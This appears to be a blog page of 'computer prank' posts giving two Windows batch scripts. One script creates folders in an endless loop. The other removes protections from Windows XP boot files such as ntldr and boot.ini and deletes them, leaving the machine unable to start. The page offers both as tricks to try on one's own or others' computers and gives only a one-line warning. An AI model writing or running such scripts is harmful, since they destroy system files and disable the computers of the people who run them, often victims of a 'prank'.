Computer Tricks and Technology News: computer prank
Showing posts with label computer prank. Show all posts
Showing posts with label computer prank. Show all posts

Make unlimted folder on desktop

0 comments

Open Notepad and Type :

@echo off
:top
md %random%
goto top 


and save with any name but extension must be .bat like abc.bat.
http://latestcomputer-tricks.blogspot.com

md %random% is for create folder command
goto top - return to label top and initiates an infinite loop.


Read More - Make unlimted folder on desktop

Shut down computer for forever- Trick for windows XP

0 comments

Open notepad and write and paste this Command :

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

and save it with ".bat" extension like abc.bat.

When operator run this command computer will shut down and it delete boot files which is needed to reboot your computer.


WARNING : This is harmful program for your and other's computer so be careful when you execute it.


Read More - Shut down computer for forever- Trick for windows XP

 

Computer Tricks

Get Computer, mobile and internet and Computer Tricks !!! :)

Read :http://www.latestcomputer-tricks.blogspot.com/ and learn ...
Computer crazy tricks | Computer tricks